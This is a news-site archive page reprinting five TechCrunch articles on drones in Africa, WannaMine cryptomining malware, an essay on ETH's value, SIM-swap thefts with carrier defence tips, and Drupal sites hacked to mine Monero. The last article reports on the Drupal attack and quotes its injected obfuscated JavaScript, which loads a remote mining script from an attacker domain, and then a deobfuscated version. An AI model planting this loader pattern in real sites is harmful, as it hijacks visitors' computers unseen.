Timesdelhi.com

September 21, 2018
Category archive

mining

African experiments with drone technologies could leapfrog decades of infrastructure neglect

in africa/Asia/benin/california/ceo/China/Civil Aviation Authority/Co-founder/Column/commercial drone alliance/Delhi/drone/e-commerce/east africa/electronics/embedded systems/Emerging-Technologies/Ghana/head/India/Information technology/JD.com/Keenan Wyrobek/kenya/Mexico/mining/north carolina/Politics/robotics/rocketmine/Rwanda/San Francisco/South Africa/Tanzania/TC/Technology/U.S. Department of Transportation/UAVs/United Nations/United States/UPS/Vayu/White House/wireless/World Economic Forum/zipline by

A drone revolution is coming to sub-Saharan Africa.

Countries across the continent are experimenting with this 21st century technology as a way to leapfrog decades of neglect of 20th century infrastructure.

Over the last two years, San Francisco-based startup Zipline launched a national UAV delivery program in East Africa; South Africa passed commercial drone legislation to train and license pilots; and Malawi even opened a Drone Test Corridor to African and its global partners. 

In Rwanda, the country’s government became one of the first adopters of performance-based regulations for all drones earlier this year. The country’s progressive UAV programs drew special attention from the White House and two U.S. Secretaries of Transportation.

Some experts believe Africa’s drone space could contribute to UAV development in the U.S. and elsewhere around the globe.

“The fact that [global drone] companies can operate in Africa and showcase amazing use cases…is a big benefit,” said Lisa Ellsman, co-executive director of the Commercial Drone Alliance.

Test in Africa

It’s clear that the UAV programs in Malawi and Rwanda are getting attention from international drone companies.

Opened in 2017, Malawi’s Drone Test Corridor has been accepting global applications. The program is managed by the country’s Civil Aviation Authority in partnership with UNICEF.

The primary purpose is to test UAV’s for humanitarian purposes, but the program “was designed to provide a controlled platform for… governments…and other partners…to explore how UAV’s can help deliver services,” according to Michael Scheibenreif, UNICEF’s drone lead in Malawi.

That decision to include the private sector opened the launch pads for commercial drones. Swedish firm GLOBEHE has tested using the corridor and reps from Chinese e-commerce company JD have toured the site. Other companies to test in Malawi’s corridor include Belgian UAV air traffic systems company Unifly and U.S. delivery drone manufacturer Vayu, according to Scheibenreif.

Though the government of Rwanda is most visible for its Zipline partnership, it shaping a national testing program for multiple drone actors. 

“We don’t want to limit ourselves with just one operator,” said Claudette Irere, Director General of the Ministry of Information Technology and Communications (MiTEC).

“When we started with Zipline it was more of a pilot to see if this could work,” she said. “As we’ve gotten more interest and have grown the program…this gives us an opportunity to open up to other drone operators, and give space to our local UAV operators.”

Irere said Rwanda has been approached by 16 drone operators, “some of them big names”—but could not reveal them due to temporary NDAs. She also highlighted Charis UAS, a Rwandan drone company, that’s used the country’s test program, and is now operating commercially in and outside of Rwanda.

UAV Policy

Africa’s commercial drone history is largely compressed to a handful of projects and countries within the last 5-7 years. Several governments have jumped out ahead on UAV policy.

In 2016, South Africa passed drone legislation regulating the sector under the country’s Civil Aviation Authority. The guidelines set training requirements for commercial drone pilots to receive Remote Pilot Licenses (RPLs) for Remotely Piloted Aircraft Systems. At the end of 2017 South Africa had registered 686 RPLs and 663 drone aircraft systems, according to a recent State of Drone Report.

Over the last year and a half Kenya, Ghana, and Tanzania have issued or updated drone regulatory guidelines and announced future UAV initiatives.  

In 2018, Rwanda extended its leadership role on drone policy when it adopted performance-based regulations for all drones—claiming to be the first country in the world to do so.

So what does this mean?

“In performance-based regulation the government states this is our safety threshold and you companies tell us the combination of technologies and operational mitigations you’re going to use to meet it,” said Timothy Reuter, Civil Drones Project Head at the World Economic Forum.

Lisa Ellsman, shared a similar interpretation.

“Rather than the government saying ‘you have to use this kind of technology to stop your drone,’ they would say, ‘your drone needs to be able to stop in so many seconds,’” she said.

This gives the drone operators flexibility to build drones around performance targets, vs. “prescriptively requiring a certain type of technology,” according to Ellsman.

Rwanda is still working out the implementation of its performance-based regulations, according to MiTEC’s Claudette Irere. They’ve entered a partnership with the World Economic Forum to further build out best practices. Rwanda will also soon release an online portal for global drone operators to apply to test there.

As for Rwanda being first to release performance-based regulations, that’s disputable. “Many States around the world have been developing and implementing performance-based regulations for unmanned aircraft,” said Leslie Cary, Program Manager for the International Civil Aviation Authority’s Remotely Piloted Aircraft System. “ICAO has not monitored all of these States to determine which was first,” she added.

Other governments have done bits and pieces of Rwanda’s drone policy, according to Timothy Reuter, the head of the civil drones project at the World Economic Forum. “But as currently written in Rwanda, it’s the broadest implementation of performance based regulations in the world.”

Commercial Use Cases

As the UAV programs across Africa mature, there are a handful of strong examples and several projects to watch.

With Zipline as the most robust and visible drone use case in Sub-Saharan Africa.

While the startup’s primary focus is delivery of critical medical supplies, execs repeatedly underscore that Zipline is a for-profit venture backed by $41 million in VC.

The San Francisco-based robotics company — that also manufactures its own UAVs — was one of the earliest drone partners of the government of Rwanda.

Zipline demonstration

The alliance also brought UPS and the UPS Foundation into the mix, who supports Zipline with financial and logistical support.

After several test rounds, Zipline went live with the program in October, becoming the world’s first national drone delivery program at scale.

“We’ve since completed over 6000 deliveries and logged 500,000 flight kilometers,” Zipline co-founder Keenan Wyrobek told TechCrunch. “We’re planning to go live in Tanzania soon and talking to some other African countries.”  

In May Zipline was accepted into the U.S. Department of Transportation’s Unmanned Aircraft Systems Integration Pilot Program (UAS IPP). Out of 149 applicants, the Africa focused startup was one of 10 selected to participate in a drone pilot in the U.S.– to operate beyond visual line of sight medical delivery services in North Carolina.    

In a non-delivery commercial use case, South Africa’s Rocketmine has built out a UAV survey business in 5 countries. The company looks to book $2 million in revenue in 2018 for its “aerial data solutions” services in mining, agriculture, forestry, and civil engineering.

“We have over 50 aircraft now, compared to 15 a couple years ago,” Rocketmine CEO Christopher Clark told TechCrunch. “We operate in South Africa, Namibia, Ghana, Ivory Coast, and moved into Mexico.”

Rocketmine doesn’t plan to enter delivery services, but is looking to expand into the surveillance and security market. “After the survey market that’s probably the biggest request we get from our customers,” said Clark.

More African use cases are likely to come from the Lake Victoria Challenge — a mission specific drone operator challenge set in Tanzania’s Mwanza testing corridor. WeRobotics has also opened FlyingLabs in Kenya, Tanzania, and Benin. And the government of Zambia is reportedly working with Sony’s Aerosense on a drone delivery pilot program.

Africa and Global UAV

With Europe, Asia, and the U.S. rapidly developing drone regulations and testing (or already operating) delivery programs (see JD.com in China), Africa may not take the sole position as the leader in global UAV development — but these pilot projects in the particularly challenging environments these geographies (and economies) represent will shape the development of the drone industry. 

The continent’s test programs — and Rwanda’s performance-based drone regulations in particular — could advance beyond visual line of sight UAV technology at a quicker pace. This could set the stage for faster development of automated drone fleets for remote internet access, commercial and medical delivery, and even give Africa a lead in testing flying autonomous taxis.

“With drones, Africa is willing to take more bold steps more quickly because the benefits are there and the countries have been willing to move in a more agile manner around regulation,” said the WEF’s Reuter.

“There’s an opportunity for Africa to maintain its leadership in this space,” he said. “But the countries need to be willing to take calculated risk to enable technology companies to deploy their solutions there.”

Reuter also underscored the potential for “drone companies that originate in Africa increasingly developing services.”

There’s a case to be made this is already happening with Zipline. Though founded in California, the startup honed its UAVs and delivery model in Rwanda.

“We’re absolutely leveraging our experience built in Africa as we now test through the UAS IPP program to deliver in the U.S.,” said Zipline co-founder Keenan Wyrobek.

News Source = techcrunch.com

Cryptocurrency mining attacks using leaked NSA hacking tools are still highly active a year later

in cryptocurrency/Cybereason/Delhi/India/Microsoft/mining/National Security Agency/petya/Politics/ransomware/Security by

It’s been over a year since highly classified exploits built by the National Security Agency were stolen and published online.

One of the tools, dubbed EternalBlue, can covertly break into almost any Windows machine around the world. It didn’t take long for hackers to start using the exploits to run ransomware on thousands of computers, grinding hospitals and businesses to a halt. Two separate attacks in as many months used WannaCry and NotPetya ransomware, which spread like wildfire. Once a single computer in a network was infected, the malware would also target other devices on the network. The recovery was slow and cost companies hundreds of millions in damages.

Yet, more than a year since Microsoft released patches that slammed the backdoor shut, almost a million computers and networks are still unpatched and vulnerable to attack.

Although WannaCry infections have slowed, hackers are still using the publicly accessible NSA exploits to infect computers to mine cryptocurrency.

Nobody knows that better than one major Fortune 500 multinational, which was hit by a massive WannaMine cryptocurrency mining infection just days ago.

“Our customer is a very large corporation with multiple offices around the world,” said Amit Serper, who heads the security research team at Boston-based Cybereason.

“Once their first machine was hit the malware propagated to more than 1,000 machines in a day,” he said, without naming the company.

Cryptomining attacks have been around for a while. It’s more common for hackers to inject cryptocurrency mining code into vulnerable websites, but the payoffs are low. Some news sites are now installing their own mining code as an alternative to running ads.

But WannaMine works differently, Cybereason said in its post-mortem of the infection. By using those leaked NSA exploits to gain a single foothold into a network, the malware tries to infect any computer within. It’s persistent so the malware can survive a reboot. After it’s implanted, the malware uses the computer’s processor to mine cryptocurrency. On dozens, hundreds, or even thousands of computers, the malware can mine cryptocurrency far faster and more efficiently. Though it’s a drain on energy and computer resources, it can often go unnoticed.

After the malware spreads within the network, it modifies the power management settings to prevent the infected computer from going to sleep. Not only that, the malware tries to detect other cryptomining scripts running on the computer and terminates them — likely to squeeze every bit of energy out of the processor, maximizing its mining effort.

At least 300,000 computers or networks are still vulnerable to the NSA’s EternalBlue hacking tools.

Based on up-to-date statistics from Shodan, a search engine for open ports and databases, at least 919,000 servers are still vulnerable to EternalBlue, with some 300,000 machines in the US alone. And that’s just the tip of the iceberg — that figure can represent either individual vulnerable computers or a vulnerable network server capable of infecting hundreds or thousands more machines.

Cybereason said companies are still severely impacted because their systems aren’t protected.

“There’s no reason why these exploits should remain unpatched,” the blog post said. “Organizations need to install security patches and update machines.”

If not ransomware yesterday, it’s cryptomining malware today. Given how versatile the EternalBlue exploit is, tomorrow it could be something far worse — like data theft or destruction.

In other words: if you haven’t patched already, what are you waiting for?

News Source = techcrunch.com

The collapse of ETH is inevitable

in author/blockchains/Column/cryptocurrencies/Delhi/distributed computing/driver/Economy/erc-20/eth/ethereum/ethereum foundation/India/kin/miner/mining/neo/Politics/smart contract by

Here’s a prediction. ETH — the asset, not the Ethereum Network itself — will go to zero.

Those who already think that ETH will not see real adoption — thanks to a failure to scale, to adopt more secure contract authoring practices, or to out-compete its competitors — don’t need to be convinced that a price collapse would follow as a consequence.

But, if one believes that Ethereum will succeed beyond anyone’s wildest dreams as a platform then the proposition that ETH (as a currency) will go to zero will take a bit more convincing running a substantial share of the world’s commerce securely.

So here’s how Ethereum ends up succeeding wildly but ETH becomes worthless. Ethereum’s value proposition, as given by ethereum.org, is as follows:

Build unstoppable applications

Ethereum is a decentralized platform that runs smart contracts: applications that run exactly as programmed without any possibility of downtime, censorship, fraud or third-party interference.

These apps run on a custom built blockchain, an enormously powerful shared global infrastructure that can move value around and represent the ownership of property.

This enables developers to create markets, store registries of debts or promises, move funds in accordance with instructions given long in the past (like a will or a futures contract) and many other things that have not been invented yet, all without a middleman or counterparty risk.

If Ethereum succeeds on its value proposition it will therefore mitigate external risk factors for decentralized applications.

İstanbul, Turkey – January 28, 2018: Close up shot of Bitcoin, Litecoin and Ethereum memorial coins and shovels on soil. Bitcoin Litecoin and Ethereum are crypto currencies and a worldwide payment system.

No Future for ‘Gas’

There’s no value proposition for ETH in the official description. Perhaps this omission is because ETH’s value seems so obvious to the Ethereum Foundation that it is hardly worth mentioning: $ETH fees (dubbed ‘Gas’) is how you pay for all this.

If the concept of gas isn’t immediately obvious, let’s expand the metaphor: The Ethereum network is like a shared car. When a contract wants to be driven by the shared car, the car uses up fuel, which you have to pay the driver for. How much gas money you owe depends on how far you had to be driven, and how much trash you left in the car.

Gas is a nice metaphor, but the metaphor is insufficient as an argument to support non-zero $ETH prices. Gasoline actually burns inside an internal combustion engine; an internal combustion engine will not work without a combustible fuel. $ETH as Gas is a metaphor for how gasoline is consumed; there is no hard requirement for Gas in an Ethereum contract.

(Photo by Manuel Romano/NurPhoto via Getty Images)

Buying the “BuzzwordCoin”

Suppose we’re building a new decentralized application, BuzzwordCoin. By default, following a standard ERC-20 Token template, every transaction on BuzzwordCoin will pay gas in $ETH. Requiring every BuzzwordCoin transaction to also depend on ETH for fees creates substantial risk, third party dependency, and artificial downwards pressure on the price of the underlying token (if one must sell BuzzwordCoin for ETH ahead of time to run a BuzzwordCoin transaction, then the sell-pressure will happen before the transaction requires it, and must be a larger sale than necessary to ensure sufficient funds to cover the transaction).

Instead of paying for Gas in ETH, we could make every BuzzwordCoin transaction deposit a small amount of BuzzwordCoin directly to the block’s miner’s address to pay for the contract’s execution. Paying for Gas in a non-ETH asset is sometimes referred  to as economic abstraction in the Ethereum community.

The revised BuzzwordCoin contract has no functional dependence on ETH. We’re able to incentivize miners to mine transactions without paying any fees in ETH whatsoever.

If the BuzzwordCoin contract has non-transactional contractual clauses — that is, a functionality that should be regularly called by any party for tasking like computing and updating cached statistics in the contract — we can specify that the miner performing those clauses receives coins from an inflation or shared gas pool. In the shared pool, all fees for user’s transactions in a specific contract are paid to the contract’s wallet. A fee dispensing contract call performing the non-transactional clauses releases the fee to the miner (this bears some semblance to Child Pays for Parent in the Bitcoin Ecosystem).

Battling the economic abstraction

There are four main counterarguments to economically abstracting Ethereum: the lack of software support for economic abstraction; difficulty in pricing many tokens; the existence of contracts not tied to tokens; and the need for ETH for Proof-of-Stake. While nuanced, all four arguments fall flat.

Software Support: Currently, miners select transactions based on the amount of Gas provided in ETH. As ETH is not a contract (like an ERC-20 token), the code is special-cased for transactions dealing in ETH. However, there are efforts to make Ethereum treat ETH less special-cased and more like other ERC-20 Tokens and vice-versa. Weth, for instance, wraps ETH in a 1:1 pegged ERC-20 compliant token for trading in Decentralized Exchanges.

Detractors of economic abstraction (notably, Vitalik Buterin) argue that the added complexity is not worth the ecosystem gains. This argument is absurd. If the software doesn’t support the needs of rational users, then the software should be amended. Furthermore, the actual wallet software required for any given token is made much more complex, as the wallet must manage balances in both ETH and the application’s token.

Market Pricing: To mine on Ethereum with economic abstraction, miners simply need software which allows them to account for discrepancies in their perceived value of active tokens and include transactions rationally on that basis.  Such software requires dynamically re-ordering pending transactions based on pricing information, gleaned either through the miner’s own outlook or monitoring cryptocurrency exchanges prices.

Vlad Zamfir argues that the potential need to monitor market information on prices makes economic abstraction difficult.

However, miners requiring pricing information is already the status quo — rational actors need a model of future ETH prices before mining (or staking) to maximize profit against electricity costs, hardware costs, and opportunity costs.

Non-Token Contracts: Not all contracts have coins, or if they do, they may not be widely recognized, valuable, and traded on exchanges. Can such contracts pay fees without ETH?

Users of a tokenless contract can pay fees in whichever tokens they want. For example, a user of TokenlessContract can pay their fees in a 50/50 mix of LemonadeCoin and TeaBucks. To ensure liquidity between users and miners with different assets they would pay or accept fees with, a user can simply issue multiple mutually-exclusive transactions paying with fees in different assets.

Specialized wallet contracts could also negotiate fees with miners directly .  A miner could also process transactions paying fee with an asset they do not want if there is an open Decentralized Exchange (DEX) offer to exchange the fee asset for something they prefer —  it is possible to create DEX orders for paying fees which allowing only a block’s miner to fill a user’s offers in proportion to the fees that a user has paid in that block preventing the case where a user’s fee diversifying offers are taken by non-miners.

Proof-of-Stake: Without ETH, a modified version of Proof-of-Stake with a multitude of assets could still decide consensus if each node selects a weight vector for the voting power of all assets (let’s call it HD-PoS, or Heterogeneous Deposit Proof Of Stake). While it is an open research question to

show under which conditions HD-PoS would maintain consensus, consensus may be possible if the weight vectors are similar enough.

Proofs of HD-PoS may be possible by assuming a bound on the pairwise euclidean distance of the weight vectors or the maximum difference between any two prices. If such a consensus algorithm proves impossible, the failure to find such an algorithm points to a more general vulnerability in Ethereum PoS.  

Assuming a future where ETH’s main utility is governance voting, why wouldn’t all the other valuable applications on Ethereum have a say in the consensus process? Rolling back actions in a valuable token contract by burning ETH stake could be a lucrative business; if HD-PoS is used such attacks are impossible.

Vitalik Buterin (Ethereum Foundation) at TechCrunch Disrupt SF 2017

ETH’s ethereal value

If all the applications and their transactions can run without ETH, there’s no reason for ETH to be valuable unless the miners enforce some sort of racket to require users to pay in ETH. But if miners are uncoordinated, mutually disinterested, and rational, they would prefer to be paid in assets of their own choosing rather than in something like ETH. Furthermore, risk-averse users would want to minimize their exposure to volatile assets they don’t have to use. Lastly, token developers benefit because pricing in their native asset should serve to reduce sell-pressure. Thus, in a stateless ecosystem, replacing ETH is a Pareto Improvement (i.e., all parties are better off). The only party disadvantaged is existing ETH holders.

  • The author holds Stellar and Bitcoin,  but has relatively little holdings in other cryptocurrencies. He has previously done a Virtual Lapel Pin Sale (like an ICO) for his cause, “Fuck Nazis”, on top of Ethereum which faced both government censorship and censorship from the Ethereum community. 

News Source = techcrunch.com

What happens when hackers steal your SIM? You learn to keep your crypto offline

in Apps/bank/blockchain/Business/coinbase/cryptography/cybercrime/Delhi/Economy/identity theft/India/mining/mobile/Politics/social engineering/T-Mobile/TC by

A year ago I felt a panic that still reverberates in me today. Hackers swapped my T-Mobile SIM card without my approval and methodically shut down access to most of my accounts and began reaching out to my Facebook friends asking to borrow crypto. Their social engineering tactics, to be clear, were laughable but they could have been catastrophic if my friends were less savvy.

Flash forward a year and the same thing happened to me again – my LTE coverage winked out at about 9pm and it appeared that my phone was disconnected from the network. Panicked, I rushed to my computer to try to salvage everything I could before more damaged occurred. It was a false alarm but my pulse went up and I broke out in a cold sweat. I had dealt with this once before and didn’t want to deal with it again.

Sadly, I probably will. And you will, too. The SIM card swap hack is still alive and well and points to one and only one solution: keeping your crypto (and almost your entire life) offline.

Trust No Carrier

Stories about massive SIM-based hacks are all over. Most recently a crypto PR rep and investor, Michael Terpin, lost $24 million to hackers who swapped his AT&T SIM. Terpin is suing the carrier for $224 million. This move, which could set a frightening precedent for carriers, accuses AT&T of “of fraud and gross negligence.”

From Krebs:

Terpin alleges that on January 7, 2018, someone requested an unauthorized SIM swap on his AT&T account, causing his phone to go dead and sending all incoming texts and phone calls to a device the attackers controlled. Armed with that access, the intruders were able to reset credentials tied to his cryptocurrency accounts and siphon nearly $24 million worth of digital currencies.

While we can wonder in disbelief at a crypto investor who keeps his cash in an online wallet secured by text message, how many other servicse do we use that depend on emails or text messages, two vectors easily hackable by SIM spoofing attacks? How many of us would be resistant to the techniques that nabbed Terpin?

Another crypto owner, Namek Zu’bi, lost access to his Coinbase account after hackers swapped his SIM, logged into his account, and changed his email while attempting direct debits to his bank account.

“When the hackers took over my account they attempted direct debits into the account. But because I blocked my bank accounts before they could it seems there are bank chargebacks on that account. So Coinbase is essentially telling me sorry you can’t recover your account and we can’t help you but if you do want to use the account you owe $3K in bank chargebacks,” he said.

Now Zu’bi is facing a different issue: Coinbase is accusing him of being $3,000 in arrears and will not give him access to his account because he cannot reply from the hacker’s email.

“I tried to work with coinbase hotline who is supposed to help with this but they were clueless even after I told them that the hackerchanged email address on my original account and then created a new account with my email address. Since then I’ve been waiting for a ‘specialist’ to email me (was supposed to be 4 business days it’s been 8 days) and I’m still locked out of my account because Coinbase support can’t verify me,” he said.

It has been a frustrating ride.

“As an avid supporter and investor in crypto it baffles me how one of the market leaders who just supposedly launched institutional grade custody solutions can barely deal with a basic account take-over fraud,” Zu’bi said.

How do you protect yourself?

I’ve been using Trezor hardware wallets for a while, storing them in safe places outside of my home and maintaining a separate record of the seeds in another location. I have very little crypto but even for a fraction of a few BTC it just makes sense to practice safe storage. Ultimately, if you own crypto you are now your own bank. That you would trust anyone – including a fiat bank – to keep your digital currency safe is deeply delusional. Heck, I barely trust Trezor and they seem like the only solution for safe storage right now.

When I was first hacked I posted recommendations by crypto exchange Kraken. They are still applicable today:

Call your telco and:

  • Set a passcode/PIN on your account

    • Make sure it applies to ALL account changes
    • Make sure it applies to all numbers on the account
    • Ask them what happens if you forget the passcode
      • Ask them what happens if you lose that too
  • Institute a port freeze

  • Institute a SIM lock

  • Add a high-risk flag

  • Close your online web-based management account

  • Block future registration to online management system

  • Hack yo’ self

    • See what information they will leak

    • See what account changes you can make

They also recommend changing your telco email to something wildly inappropriate and using a burner phone or Google Voice number that is completely disconnected from your regular accounts as a sort of blind for your two factor texts and alerts.

Sadly, doing all of these things is quite difficult. Further, carriers don’t make it easy. In May a 27-year-old man named Paul Rosenzweig fell victim to a SIM-swapping hack even though he had SIM lock installed on his account. A rogue T-Mobile employee bypassed the security, resulting in the loss of a unique three character Twitter and Snapchat account.

Ultimately nothing is secure. The bottom line is simple: if you’re in crypto expect to be hacked and expect it to be painful and frustrating. What you do now – setting up real two-factory security, offloading your crypto onto physical hardware, making diligent backups, and protecting your keys – will make things far better for you in the long run. Ultimately, you don’t want to wake up one morning with your phone off and all of your crypto siphoned off into the pocket of a college kid like Joel Ortiz, a hacker who is now facing jail time for “13 counts of identity theft, 13 counts of hacking, and two counts of grand theft.” Sadly, none of the crypto he stole has surfaced after his arrest.

News Source = techcrunch.com

Outdated website software lets hackers mine cryptocurrencies at your expense

in Amazon/Apps/computing/content management system/cryptocurrencies/Delhi/drupal/Firefox/free software/India/Javascript/Mexico/mining/Monero/Politics/Software/TC/United States/Web browsers by

An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of Javascript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.

The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:

var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);

Which, deobfuscated, translates to:

'use strict';
var dZ1 = window["document"]"getElementsByTagName"[0];
var ZBRnO2 = window["document"]"createElement";
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
dZ1"appendChild";

The domain it calls, vuuwd.com, is down.

BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.”

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.

News Source = techcrunch.com

Go to Top